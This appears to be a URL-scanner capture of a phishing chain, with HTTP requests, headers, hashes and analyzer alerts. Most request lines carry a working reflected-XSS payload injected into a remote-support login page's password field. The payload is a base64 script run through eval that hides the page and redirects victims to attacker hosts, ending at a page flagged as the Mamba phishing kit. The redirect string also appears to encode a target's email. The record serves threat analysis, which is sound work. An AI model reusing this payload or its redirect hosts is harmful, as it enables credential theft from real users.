GET remotesupport.level8tech.net/appliance/content/appliance.js
50.199.20.75200 OK 750 B URL GET remotesupport.level8tech.net/appliance/content/appliance.js
IP 50.199.20.75:443
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate IssuerLet's Encrypt
Subjectremotesupport.level8tech.net
Fingerprint24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
ValidityWed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
Hash 014e8fa1aeb747000950054d575c7955
5bba82fc873385d5bc4cd8ef5b1c14680a17cc64
f9b95619a60b979771a901aeb43632dbc744bd2fea8c3fecd772a9589988d15e
GET /appliance/content/appliance.js HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:30 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000
Vary: X-Requested-With,Accept-Encoding
Last-Modified: Tue, 23 Feb 2021 23:11:09 GMT
ETag: "2ee-5bc0908a03d40-gzip"
Accept-Ranges: bytes
Content-Encoding: gzip
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 438
Content-Type: application/javascript
GET remotesupport.level8tech.net/appliance/content/bomgar177.jpg
0.0.0.0 0 B URL GET remotesupport.level8tech.net/appliance/content/bomgar177.jpg
IP 0.0.0.0:0
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate IssuerLet's Encrypt
Subjectremotesupport.level8tech.net
Fingerprint24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
ValidityWed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /appliance/content/bomgar177.jpg HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
0.0.0.0 0 B URL User Request GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 0.0.0.0:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
NIDS Severity Alert suricata low ET HUNTING [TW] Likely Javascript-Obfuscator Usage Observed M2
suricata low ET HUNTING [TW] Likely Javascript-Obfuscator Usage Observed M3
GET /qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
Host: accounting-portal.bchsaa.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
GET taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
162.241.27.245200 OK 2.9 kB URL User Request GET taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Certificate IssuerLet's Encrypt
Subject*.taxexpertscan.com
Fingerprint95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
ValidityMon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
File type HTML document, ASCII text, with very long lines (2606)
Hash 8465cecd5bc2324d9f842c2b21b7fdf4
a166f57cc184756953a253d5d4c7ff2bc6abae2a
127a21653010daf5d532892ffa127eaab1f895eaf99f51b8af84a4df270cc270
Analyzer Verdict Alert urlquery suspicious Suspicious - Anti-debugging code
urlquery phishing Phishing - Mamba Phishing Kit
GET /s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
Host: taxexpertscan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://accounting-portal.bchsaa.org/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
cache-control: no-store
set-cookie: _cid=79a110db5e803c22ede226733ed72029; expires=Fri, 30 May 2025 16:19:36 GMT; Max-Age=60
vary: Accept-Encoding
content-encoding: gzip
content-length: 1666
content-type: text/html; charset=UTF-8
date: Fri, 30 May 2025 16:18:35 GMT
server: Apache
X-Firefox-Spdy: h2
GET taxexpertscan.com/files/images/Logo.png
162.241.27.245200 OK 1.1 kB URL GET taxexpertscan.com/files/images/Logo.png
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Requested by https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Certificate IssuerLet's Encrypt
Subject*.taxexpertscan.com
Fingerprint95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
ValidityMon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
File type HTML document, ASCII text
Hash 622bb6a2c6ccd71fc0ad9eb990a303f3
ca504ab1f48937b94940735c646e03a7e3234977
683da311341984442913d7acb1362e3d6dfc8691f84db4d597cacf00118b8732
Analyzer Verdict Alert urlquery phishing Phishing - Mamba Phishing Kit
OpenPhish phishing Generic/Spear Phishing
GET /files/images/Logo.png HTTP/1.1
Host: taxexpertscan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
content-length: 567
content-type: text/html; charset=UTF-8
date: Fri, 30 May 2025 16:18:36 GMT
server: Apache
X-Firefox-Spdy: h2
142.250.74.78404 Not Found 1.6 kB IP 142.250.74.78:443
Certificate IssuerGoogle Trust Services
Subject*.google.com
Fingerprint7B:D2:02:FC:58:D9:E6:6C:DB:4E:0A:85:10:91:65:A5:9A:9C:5D:12
ValidityMon, 12 May 2025 08:42:58 GMT - Mon, 04 Aug 2025 08:42:57 GMT
File type HTML document, Unicode text, UTF-8 text, with very long lines (1136)
Hash bc0ad2db3272298238c3933ea0d944d1
ccb1767caf616c73513dc921cd3f5da072582a77
0a6ad5109827eff80f61f2106f29d9fb38ce486fa397551e506bf5b6ed861f36
GET /404/ HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://taxexpertscan.com/
DNT: 1
Connection: keep-alive
Cookie: SOCS=CAESHAgBEhJnd3NfMjAyMjA5MjktMF9SQzEaAnJvIAEaBgiAkvOZBg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 404 Not Found
content-type: text/html; charset=UTF-8
referrer-policy: no-referrer
content-length: 1565
date: Fri, 30 May 2025 16:18:38 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
GET remotesupport.level8tech.net/appliance/content/style.css
50.199.20.75200 OK 8.9 kB URL GET remotesupport.level8tech.net/appliance/content/style.css
IP 50.199.20.75:443
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate IssuerLet's Encrypt
Subjectremotesupport.level8tech.net
Fingerprint24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
ValidityWed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
File type assembler source, ASCII text
Hash 5c9426c78554738a1d62fb81061a0054
1492debf3040ffd2dec27763b0aec3c720f7d2f5
3a738fc0e46affbce2f8ca2c3c6af85f813d8da3ecfafd8133f2082b07224fa4
GET /appliance/content/style.css HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:30 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000
Vary: X-Requested-With,Accept-Encoding
Last-Modified: Tue, 23 Feb 2021 23:11:09 GMT
ETag: "22cb-5bc0908a03d40-gzip"
Accept-Ranges: bytes
Content-Encoding: gzip
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 2769
Content-Type: text/css
GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
45.61.161.154200 OK 2.8 kB URL User Request GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 45.61.161.154:80
ASN #206216 Advin Services LLC
File type JavaScript source, ASCII text, with very long lines (2223)
Hash d2c4021ccbe0ab9f44b8f6aa94a19e90
2cc0b4a67d33e60cb8aa7b4eef5bc2dda91fe243
cc855898df11622e20a2c45d07b06c88700b1043712af6d15de3d34edf06c4bb
NIDS Severity Alert suricata low ET HUNTING [TW] Likely Javascript-Obfuscator Usage Observed M2
suricata low ET HUNTING [TW] Likely Javascript-Obfuscator Usage Observed M3
GET /qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
Host: accounting-portal.bchsaa.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: gunicorn
Date: Fri, 30 May 2025 16:18:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2807
GET accounting-portal.bchsaa.org/favicon.ico
45.61.161.154200 OK 0 B URL GET accounting-portal.bchsaa.org/favicon.ico
IP 45.61.161.154:80
ASN #206216 Advin Services LLC
Requested by http://accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /favicon.ico HTTP/1.1
Host: accounting-portal.bchsaa.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: gunicorn
Date: Fri, 30 May 2025 16:18:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 0
POST accounting-portal.bchsaa.org/araga3ad
45.61.161.154200 OK 158 B URL POST accounting-portal.bchsaa.org/araga3ad
IP 45.61.161.154:80
ASN #206216 Advin Services LLC
Requested by http://accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Hash 5df1f50ef2808ae2af1e09bd6cc96885
8e5da83f889b2450875b9553abe7c4398dcfa7c9
23c44264e0475c391781fd7df73ede35fefd528a368132c52ec8b3cf9f534fb2
POST /araga3ad HTTP/1.1
Host: accounting-portal.bchsaa.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Content-Type: application/json
Content-Length: 424
Origin: http://accounting-portal.bchsaa.org
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: gunicorn
Date: Fri, 30 May 2025 16:18:35 GMT
Connection: close
Content-Type: application/json
Content-Length: 158
GET www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
142.250.178.100200 OK 3.2 kB URL GET www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
IP 142.250.178.100:443
Certificate IssuerGoogle Trust Services
Subjectwww.google.com
Fingerprint84:BD:0D:9A:51:CC:86:3E:E9:2F:6E:7C:2D:58:AC:4C:FB:B5:3D:8C
ValidityMon, 12 May 2025 08:44:44 GMT - Mon, 04 Aug 2025 08:44:43 GMT
File type PNG image data, 150 x 54, 8-bit/color RGBA, non-interlaced
Hash 9d73b3aa30bce9d8f166de5178ae4338
d0cbc46850d8ed54625a3b2b01a2c31f37977e75
dbef5e5530003b7233e944856c23d1437902a2d3568cdfd2beaf2166e9ca9139
GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: SOCS=CAESHAgBEhJnd3NfMjAyMjA5MjktMF9SQzEaAnJvIAEaBgiAkvOZBg
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
accept-ranges: bytes
content-type: image/png
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="static-on-bigtable"
report-to: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
content-length: 3170
date: Fri, 30 May 2025 16:18:38 GMT
expires: Fri, 30 May 2025 16:18:38 GMT
cache-control: private, max-age=31536000
last-modified: Tue, 22 Oct 2019 18:30:00 GMT
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
GET remotesupport.level8tech.net/appliance/content/globe.png
0.0.0.0 0 B URL GET remotesupport.level8tech.net/appliance/content/globe.png
IP 0.0.0.0:0
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate IssuerLet's Encrypt
Subjectremotesupport.level8tech.net
Fingerprint24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
ValidityWed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /appliance/content/globe.png HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
GET taxexpertscan.com/favicon.ico
162.241.27.245200 OK 1.1 kB URL GET taxexpertscan.com/favicon.ico
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Requested by https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Certificate IssuerLet's Encrypt
Subject*.taxexpertscan.com
Fingerprint95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
ValidityMon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
File type HTML document, ASCII text
Hash 622bb6a2c6ccd71fc0ad9eb990a303f3
ca504ab1f48937b94940735c646e03a7e3234977
683da311341984442913d7acb1362e3d6dfc8691f84db4d597cacf00118b8732
Analyzer Verdict Alert urlquery phishing Phishing - Mamba Phishing Kit
OpenPhish phishing Generic/Spear Phishing
GET /favicon.ico HTTP/1.1
Host: taxexpertscan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
content-length: 567
content-type: text/html; charset=UTF-8
date: Fri, 30 May 2025 16:18:36 GMT
server: Apache
X-Firefox-Spdy: h2
POST taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
162.241.27.245301 Moved Permanently 1.6 kB URL User Request POST taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Certificate IssuerLet's Encrypt
Subject*.taxexpertscan.com
Fingerprint95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
ValidityMon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert urlquery suspicious Suspicious - Anti-debugging code
urlquery phishing Phishing - Mamba Phishing Kit
POST /s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
Host: taxexpertscan.com
